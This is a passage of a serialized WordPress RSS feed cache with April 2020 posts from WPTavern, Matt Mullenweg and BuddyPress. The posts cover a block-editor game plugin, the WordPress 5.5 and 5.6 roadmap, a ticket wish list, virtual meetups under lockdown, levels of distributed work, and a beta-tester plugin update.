There is at least one missing piece that I would like to see in a future version of the plugin. It would be nice to integrate alignment options for the block, such as center, wide, and full alignments that are common with many other blocks.

\n\n\n\n

On the plus side, the plugin developer took the few moments necessary to load scripts and styles only on pages where the game is in use. If you want to run the game, you do not have to worry about it loading unnecessary files on every page of your website.

\n\n\n\n

Future Plugin and Block Plans

\n\n\n\n

Currently, Block-a-saurus is still sitting at version 1.0. However, Koppenhaver has plans to add extra features to the plugin, such as saving high scores for logged-in users and potentially making the game playable in the backend. The holdup with admin-side playing is some JavaScript conflicts with the native Gutenberg controls.

\n\n\n\n

“Work is moving along pretty steadily,” he said of new features. “It’s nice to have something relatively small and self-contained to work on in between larger client projects. The saving of scores has been the majority of the work so far, and I’m hoping to have that released in the next couple of weeks.”

\n\n\n\n

Koppenhaver does not have any immediate plans for similar types of blocks. The plan was for this particular plugin to showcase a fun, one-off block. “I’ve seen JavaScript implementations of Snake and Tetris, which would be cool to see converted to blocks,” he said. “I might have to give one of those a try.” Perhaps Block-a-saurus is not the end of the road.

\n\n\n\n

If he wraps up the work on a front-end, JavaScript-based saving feature for high scores, it would be nice to see that offered as a standalone package for other block developers to use. It would certainly make porting other games such as Snake and Tetris to the block system easier.

\n\n\n\n

Koppenhaver and his team primarily work on more serious endeavors. “We have been working on some other block experiments to allow for things like integrating data sourced from Google Drive as D3 visualizations as well as a block to allow agencies to create better case studies by creating those responsive screenshot mockups you see everywhere and being able to create them completely in Gutenberg,” he said. “We’re very excited about the experiences the new editor has allowed us to create and are always experimenting and trying to learn more.”

\n\n\n\n

More than anything, I want to see other plugin authors launch a few more games for the block editor.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 14 Apr 2020 18:57:54 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: The Road Ahead: What’s in Store for WordPress for the Rest of 2020?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98522\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:193:\"https://wptavern.com/the-road-ahead-whats-in-store-for-wordpress-for-the-rest-of-2020?utm_source=rss&utm_medium=rss&utm_campaign=the-road-ahead-whats-in-store-for-wordpress-for-the-rest-of-2020\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:9338:\"
\n
\n

Full-site editing, automatic theme and plugin updates, global styles, and more await. With the release of WordPress 5.4 and an open call for version 5.5 tickets, it is time to peer into the future and catch a glimpse of what is to come. It is shaping up to be an exciting year thus far.

\n
\n
\n\n\n\n

Josepha Haden, executive director of WordPress, provided a progress update on the 2020 goals in early March. As always, the timeline to hit certain goals can change based on roadblocks the development team hits and other factors. On the whole, the tentative roadmap looks feasible.

\n\n\n\n

Currently, WordPress 5.5 is set to ship on August 11, 2020. Version 5.6 is scheduled to follow on December 8, 2020. Some major changes are forthcoming. Let us take a moment to look ahead and see where the WordPress ship is sailing.

\n\n\n\n

Automatic Updates for Everything

\n\n\n\nAutomatic updates column on the plugin management screen.\n\n\n\n

We have enjoyed automatic updates for minor versions of core WordPress since version 3.7. However, until recently, it has felt like progress on auto-updating everything had stalled. From mobile phones to smart TVs, the average end-user is accustomed to their software simply staying updated. In 2020, it is time WordPress continues pushing forward, particularly when staying updated is one component of maintaining a secure website.

\n\n\n\n

There are two separate changes centered on automatic updates in the pipeline. The first, which is set to ship in WordPress 5.5, is automatic updates for plugins and themes. The feature plugin has been in development for several months and should be stable enough to launch with the next version of WordPress.

\n\n\n\n

Plugin and theme developers will need to adopt a development strategy that aligns more with the WordPress philosophy of maintaining backward compatibility, at least to the point where an automatic update does not break a user’s site. This change is a welcome one because it will lead to a more secure web. However, it will be interesting to see how this plays out in the months to come. I am certain there will be a road bump or two that the developer community will need to overcome.

\n\n\n\n

Automatic updates of core WordPress is slated to officially land in version 5.6. It should be an opt-in feature when it rolls out. The feature plugin should also be ready by the time WordPress 5.5 lands.

\n\n\n\n

Block Directory Integration

\n\n\n\nWordPress.org’s block directory page.\n\n\n\n

The block directory first landed in Gutenberg 6.5 as an experimental feature. For those of us running the plugin, it is almost easy to forget that it is not already a part of WordPress.

\n\n\n\n

The block directory is a listing of a special type of plugin that adds only a single block. In WordPress 5.5, users should be able to search and install blocks from this directory via the post editing screen. If you need a block that is not installed, you can install and begin using it without going through the normal routine with installing a plugin.

\n\n\n\n

Full-Site Editing

\n\n\n\n
\n\n
Live Demo Q&A from The Gutenberg Times.\n\n\n\n

I am excited about the prospect of full-site editing landing in WordPress. I am concerned that a target date within 2020 may be rushing a feature that may not be ready. I want this to be a successful transition of how themes work and how users interact with their sites. I am optimistic about this future, but I am not convinced it will be good enough by the time WordPress 5.6 ships.

\n\n\n\n

Aside from the introduction of the block editor itself, this will be one of the largest changes to how WordPress works in its history. Arguably, it is a more wide-reaching change because it touches both the backend user interface and how the theme templating system functions. It needs time to age before it’s dropped into the laps of end-users and developers alike.

\n\n\n\n

I will be the first to jump for joy if I am wrong.

\n\n\n\n

Currently, the plan is to complete the full-site editing feature in the Gutenberg plugin by the time WordPress 5.5 launches. It should still be behind the experimental flag in the plugin at that point. Then, ship the finished product in version 5.6.

\n\n\n\n

Block Areas (Widgets)

\n\n\n\nUsing blocks on the experimental block areas screen.\n\n\n\n

One of the features that has not gotten near enough attention is the conversion of traditional sidebars into block areas. This is a much-needed change in the mission to turn everything into a block.

\n\n\n\n

Currently, it is planned to ship in WordPress 5.6, alongside full-site editing. I would rather see block areas as a stepping stone toward full-site editing. It would be less painful for theme authors to have at least a major release to ease into the next step.

\n\n\n\n

The development of this feature could have been much smoother if WordPress would have simply deprecated sidebars and widgets. The Gutenberg team has had to pigeonhole a block-based system into the old widgets system. It is a little messy. Instead of the current approach, they should have created a separate system and allowed theme developers to begin opting into it. Because theme authors are the ones who will be handling support requests from end-users, they should have been given the power to handle that transition gracefully.

\n\n\n\n

Overall, there should be no issue making sure block areas are feature-complete by 5.6. Much of the work is finished at this point, and we should be getting a more accurate picture of this feature in the coming months.

\n\n\n\n

Global Styles

\n\n\n\nExample mockup from the primary global styles ticket.\n\n\n\n

A new global styles feature is set to ship for WordPress 5.6 later this year. The feature is currently undergoing heavy development. We should begin to see early iterations of it in upcoming versions of the Gutenberg plugin over the next several months.

\n\n\n\n

Global styles will allow theme authors to create several default values, likely via a JSON file. In turn, users will be able to overwrite those styles through an interface in the admin.

\n\n\n\n

My biggest concern about this feature is that it could go overboard with options that end-users should not have to concern themselves with. For example, most users should have no need to adjust the line-height for their text. Instead, line-height values should automatically be calculated based on a font’s x-height and size. The question is going to be where the global styles feature will draw the line. At a certain point, it is better to learn CSS. We certainly cannot expose every possibility via an option.

\n\n\n\n

Other Notable Features

\n\n\n\n

Lazy loading of images, which was originally planned for WordPress 5.4, will be shipping alongside a built-in XML sitemaps feature in version 5.5. Both features have been under active development for months and are stable at this point.

\n\n\n\n

The navigation block was complete enough to ship in the previous WordPress release. The block is intended to primarily be used with full-site editing, so the block was not included. However, it is supposed to be available in WordPress 5.5.

\n\n\n\n

As always, we should see a new default theme to propel us into the next year. My guess is that the core leads will want to ship a theme that is built completely on top of the upcoming full-site editing feature. If development goes as currently scheduled, Twenty Twenty-One could be a 100% block-based theme.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 13 Apr 2020 20:54:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"WPTavern: Open Call for WordPress 5.5 Tickets: What’s on Your Wish List?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98435\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:183:\"https://wptavern.com/open-call-for-wordpress-5-5-tickets-whats-on-your-wish-list?utm_source=rss&utm_medium=rss&utm_campaign=open-call-for-wordpress-5-5-tickets-whats-on-your-wish-list\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3580:\"

Now that WordPress 5.4 has successfully launched, it is time to begin thinking about version 5.5, which has a tentative release date of August 8, 2020. On Wednesday, Josepha Haden, Executive Director of WordPress, put out a call for tickets.

\n\n\n\n

Naturally, the block editor is the top focus as we continually inch toward new features such as a refreshed interface, block patterns, and eventually full-site editing. However, there is room to put a small dent in the thousands of tickets that are still awaiting the right people to move them forward.

\n\n\n\n

Currently, there are 223 tickets assigned to the 5.5 milestone. We are early in the release cycle, so now is the time to advocate for the inclusion of that particular bug fix or enhancement you have had your eye on.

\n\n\n\n

What tickets do you want to see addressed?

\n\n\n\n

Wish List: Finished Custom Post Status API

\n\n\n\n

While I have no expectations that my personal wish list item will make the WordPress 5.5 cut, it does not mean that I cannot hope. After 10 years in the making, with a fix here and there, I would love to see custom post statuses become feature complete.

\n\n\n\n

A good example use case for custom post statuses is forum plugins. Topics or threads can either have an open or closed status. There are other cases such as archive, spam, hidden, and orphan statuses. Management of forums typically happens on the site front end, so plugin authors usually build custom front-end solutions to handle statuses.

\n\n\n\n

The scenarios where users need to assign a post status in the admin is where things get tricky. In the past, it was a simple matter of recreating the “publish” meta box on the edit post screen with a custom status dropdown. With the block editor, I am sure it is possible to do something similar with JavaScript. If so, this still leaves plugin authors in a bind. They will need to code at least two methods to pigeonhole custom statuses into the WordPress editor — three if also doing so on the front end.

\n\n\n\n

It is time we have a complete post status API.

\n\n\n\n

The lack of custom status support in the core user interface has created several roadblocks for projects I have worked on through the years. At one point, there seemed to be some traction to make this a reality, but it seems to have fallen to the wayside as more important and shinier features have been given the green light.

\n\n\n\n

Custom post statuses are as easy to register as custom post types and taxonomies. The primary missing element is the UI integration on the post editing screen.

\n\n\n\n

There is a real need for this feature as outlined by developers in a related Gutenberg ticket. Some agencies and organizations with a more complex editing workflow cannot move forward with the block editor on some projects, even if they want to do so.

\n\n\n\n

The WP Statuses plugin by Mathieu Viet could ease the pain for developers with its integration with both the block and classic editors. However, this level of integration belongs in the core software.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 10 Apr 2020 19:54:37 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"WPTavern: State of the Meetup Under Lockdown\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98421\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:133:\"https://wptavern.com/state-of-the-meetup-under-lockdown?utm_source=rss&utm_medium=rss&utm_campaign=state-of-the-meetup-under-lockdown\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6466:\"

By now we’re all getting weary of the phrase “new normal.” Much ink has been spilled over the question of what that new normal will look like after the pandemic has passed over us. There’s a stubborn streak in the American national character that admits of little change but, like an assiduous puppy, finds what works.

\n\n\n\n

I’ve been attending the local WordPress Meetup since moving to Asheville, North Carolina, three years ago. Finding myself in a new city, getting out into the community and meeting people in the same industry seemed like a good opportunity to get connected. And it worked. I’ve lived in a handful of cities, and nothing has worked faster and better in getting me acclimated to a new locale. As I write now from a sort of exile, present circumstances make clear why the meetup matters.

\n\n\n\n

The WordPress community is a naturally diverse one. But diversity itself is neither inherently good nor bad. Developers all over the world may commit to the same codebase, but that doesn’t mean they’re all together. Working among GitHub avatars and social media accounts alone, it’s easy to allow in-group preference to collect and fester and eventually spill out; as it did recently with a brouhaha about a certain baseball cap.

\n\n\n\n

The WordPress meetup is an in-group breaker. People of wildly different backgrounds manage to come together around a common theme (sometimes literally a theme). We meet in person, face to face, catch up on old things, and learn all new things. Depending on who you sit next to, you might even hear a dirty joke. We get the all-important sense of being in what the ancient Greeks called the polis, the city-state. We’re all different, but Asheville is our city-state, and WordPress is why, twice a month, we get out of our homes and assemble. When we talk about democratizing publishing that means for everyone. This is why the meetup is important, and why it must go on even during a pandemic.

\n\n\n\n\n\n\n\n

At the meetup, we’re not just learning about WordPress. We’re learning about each other. Business cards change hands. Smiles and handshakes lighten the air. Asheville is a beer town, so there’s often a brew before, sometimes during, and always after. This kind of fellowship is a critical ingredient to building a tight-knit group, yet it’s what we sacrifice first when the order to keep “social distance” comes down.

\n\n\n\n

Social distance? I thought. How is it possible to even have a meetup under such frosty circumstances? But have a meetup we did—at least virtually.

\n\n\n\n

As the order to distance and stay at home came down, I canceled my “Basics of SEO” presentation and pondered whether the meetup will simply have to wait until the virus clears. John Dorner, a local developer and arch-organizer, decided we must give the virtual thing a try. Who knows how long we’ll be barred from gathering?

\n\n\n\n

These days we’re all familiar with Google MeetSkype, and a host of other video conference tools. I’ve been working remotely for three years now, and regular video meetings are part of my weekly routine. It’s not that the video conference software isn’t perfectly adequate, but there is a lack of warmth about it. It’s perfunctory, a means to an end. But maybe I was wrong.

\n\n\n\n

As the virtual meeting launches, we have the usual throat-clearing and the customary hiccups. Ambient noise. Broken microphones and webcams require certain attendees to post chat comments. But we finally get down to business. Dorner encourages all the new people to join the Slack channel, where members can post questions, get help, and continue the conversation after the meetup. We spin a digital wheel of fortune to decide who gets the free JetBrains license—our regular giveaway, which I’ve won twice now.

\n\n\n\n

Soon, John presents his screen and shows us how we can better manage large clusters of media files in our WordPress sites. It all goes off without a hitch. I volunteer to give my talk at the next meeting.

\n\n\n\n

Our Asheville area group has a long list of subscribers. Yet, we only see a fraction of that RSVP regularly. Often, people will RSVP but not be able to attend. More universal topics tend to bring out larger crowds. For some, making it out to a 6 PM meeting on a weeknight is a big ask.

\n\n\n\n

The benefit of the virtual meetup is that it gives those with busier schedules and longer travel times a chance to attend a topic they’re interested in but may have otherwise skipped. We miss out on the fellowship, but we get the knowledge.

\n\n\n\nJohn Dorner performs impressive card magic.\n\n\n\n

As time and space allow, we can consider what the long term outlook might be. Right now, it’s just a series of if/then statements. We’re all waiting.

\n\n\n\n

As the virtual meetup came to a close, it occurred to me that we could probably expand our boundaries a little bit. I can invite coworkers in Virginia Beach to check out our local meetup. I could invite family from Florida if they were interested. But then, would the Asheville WordPress Meetup lose its local flavor? Is that a bad thing?

\n\n\n\n

Eventually, the pandemic will pass, as all pandemics do. The meetup may land on the hybrid model, having virtual meetings from time to time while keeping the live thing going. I hope we’ll find a happy mix. A meetup without the local flavor, and the camaraderie, would not be the same.

\n\n\n\n

Even if handshakes are replaced with elbow bumps, and we learn to stop touching our faces and to sneeze into our shirts, we need a place to go where we can assemble to keep the polis lively. Change is inevitable, and there’s nothing new about “new normals,” but we don’t do ourselves any favors by canceling what we know works best. Our exile on our personal Elbas will end, and we must go back out into society not as frightened peasants but rather as Napoleons of the new normal—whatever that will be.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 10 Apr 2020 16:03:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Chris Maiorana\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"Matt: Distributed Work’s Five Levels of Autonomy\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"https://ma.tt/?p=51231\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://ma.tt/2020/04/five-levels-of-autonomy/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:8880:\"\n\n\n\n

I recently had the opportunity to sit down with Sam Harris, author and host of the Making Sense podcast, for a wide-ranging conversation. Given the moment we’re currently living through, we naturally touched on the way companies are adapting to a new reality — one where remote work is a model to which they must adapt in a matter of days, rather than years.

\n\n\n\n
\n\n
\n\n\n\n

As I mentioned to Sam on the podcast, “any company that can enable their people to be fully effective in a distributed fashion, can and should do it far beyond after this current crisis has passed.” It’s a moral imperative. But that doesn’t mean it’s going to be easy, or that the chaotic and stressful first taste some workplaces are getting right now is one that inspires them to keep trying.

\n\n\n\n

To make sense of this journey — from a company’s cautious exploration of remote possibilities to a fully realized distributed experience — I like to think of how it plays out through the concept of levels of distributed work, which I modeled after self-driving car levels of autonomy. I’ve seen some solid recaps of my conversation with Sam from Steve Glaveski and Steve Jurvetson, but here’s my gist of how distributed companies evolve:

\n\n\n\n
  1. Level Zero autonomy is a job which cannot be done unless you’re physically there. Imagine construction worker, barista, massage therapist, firefighter… Many companies assumed they had far more of these than it has turned out they really did.
  2. The first level is where most colocated businesses are: there’s no deliberate effort to make things remote-friendly, though in the case of many knowledge workers, people can keep things moving for a day or two when there’s an emergency. More often than not, they’ll likely put things off until they’re back in the office. Work happens on company equipment, in company space, on company time. You don’t have any special equipment and may have to use a clunky VPN to access basic work resources like email or your calendar. Larger level one companies often have people in the same building or campus dialing into a meeting. Level one companies were largely unprepared for this crisis.
  3. Level two is where many companies have found themselves in the past few weeks with the COVID-19 pandemic. They’ve accepted that work is going to happen at home for a while, but they recreate what they were doing in the office in a “remote” setting, like Marshall McLuhan talked about new media mediums initially copying the generation before. You’re probably able to access information from afar, you’ve adapted to tools like Zoom or Microsoft Teams, but everything is still synchronous, your day is full of interruptions, no real-time meetings have been canceled (yet), and there’s a lot of anxiety in management around productivity — that’s the stage where companies sometimes install surveillance software on laptops. Pro tip: Don’t do that! And also: Don’t stop at level two!
  4. At the third level, you’re really starting to benefit from being remote-first, or distributed. That’s when you see people invest in better equipment — from a good desk lamp to solid audio gear — and in more robust asynchronous processes that start to replace meetings. It’s also the point at which you realize just how crucial written communication is for your success, and you start looking for great writers in your hiring. When you are on a Zoom, you often also have a Google Doc up with the other meeting participants so you can take and check real-time notes together. Your company has a zero-trust BeyondCorp security model. In a non-pandemic world you plan meetups so teams can break bread and meet each other in person a week or two a year.
  5. Level four is when things go truly asynchronous. You evaluate people’s work on what they produce, not how or when they produce it. Trust emerges as the glue that holds the entire operation together. You begin shifting to better — perhaps slower, but more deliberate — decision-making, and you empower everyone, not just the loudest or most extroverted, to weigh in on major conversations. You tap into the global talent pool, the 99% of the world’s population and intelligence that doesn’t live near one of your legacy physical office locations. Employee retention goes way up, and you invest more in training and coaching. Most employees have home-office setups that would make office workers green with envy. You have a rich social life with people you choose. Real-time meetings are respected and taken seriously, almost always have agendas and pre-work or post-work. If you get good at baton passes work will follow the sun 24/7 around the world. Your organization is truly inclusive because standards are objective and give people agency to accomplish their work their way.
  6. Finally, I believe it’s always useful to have an ideal that’s not wholly attainable — and that’s level five, Nirvana! This is when you consistently perform better than any in-person organization could. You’re effortlessly effective. It’s when everyone in the company has time for wellness and mental health, when people bring their best selves and highest levels of creativity to do the best work of their careers, and just have fun. \"🤠\"
\n\n\n\n

A highly influential book for me in designing Automattic was Daniel Pink’s Drive, where he eloquently introduces the three things that really matter in motivating people: mastery, purpose, and autonomy. Mastery is the urge to get better skills. Purpose is the desire to do something that has meaning, that’s bigger than yourself. These first two principles physically co-located companies can be great at. But the third, autonomy, is where even the best in-office company can never match a Level 4 or above distributed company.

\n\n\n\n

Autonomy is our desire to be self-directed, to have agency over ourselves and our environment. Close your eyes and imagine everything around you in a physical office: the chair you’re in, the desk, distance from a window, the smells, the temperature, the music, the flooring, what’s in the fridge, the comfort and privacy of the bathrooms, the people (or pets) around you, the lighting. Now imagine an environment where you can choose and control every one of those to your liking — maybe it’s a room in your house, a converted garage, a shared studio, or really anything, the important thing is you’re able to shape the environment fit your personal preferences, not the lowest common denominator of everyone an employer has decided to squish together for 8 hours a day. The micro-interactions of the hundreds of variables of your work environment can charge you and give you creative energy, or make you dependent, infantilized, and a character in someone else’s story. Which do you want to spend half of your waking workday hours in?

\n\n\n\n

For a good summary of Dan Pink, check out this animation. The other books I referenced in the podcast are Geoffrey West’s Scale and Nassim Nicholas Taleb’s Antifragile.

\n\n\n\n

My talk with Sam covered many other topics, from communicating in distributed companies to the challenges businesses are facing due to COVID-19, so I hope you head over and listen to the rest or stream it on Youtube.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 10 Apr 2020 14:33:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"BuddyPress: BP Beta Tester 1.1.0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://buddypress.org/?p=310880\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://buddypress.org/2020/04/bp-beta-tester-1-1-0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1607:\"

Hi BuddyPress contributors,

\n\n\n\n

We’ve just updated the plugin to help you test BuddyPress beta & RC releases. From now on, when testing BuddyPress pre-releases, you’ll find a new section into the plugin’s administration screen called “What to expect from next release?” as shown below.

\n\n\n\n
\"\"
\n\n\n\n

By clicking on the “our Development Blog” link you will be headed to the development notes of the BuddyPress next release. It’s a good way to know about the important changes the BuddyPress final release will bring.

\n\n\n\n
\n
BP Beta Tester
\n
\n\n\n\n

It’s the right time to play with this plugin! BuddyPress 6.0.0-beta1 has been released a few days ago. Once again thanks in advance for testing it: it’s an important stage of the development process for us.

\n\n\n\n

Finally props to @iamthewebb for contributing to this new version of BP Beta Tester.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 10 Apr 2020 04:05:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Mathieu Viet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: Fighting the Stay-At-Home Boredom: Time to Create Rather Than 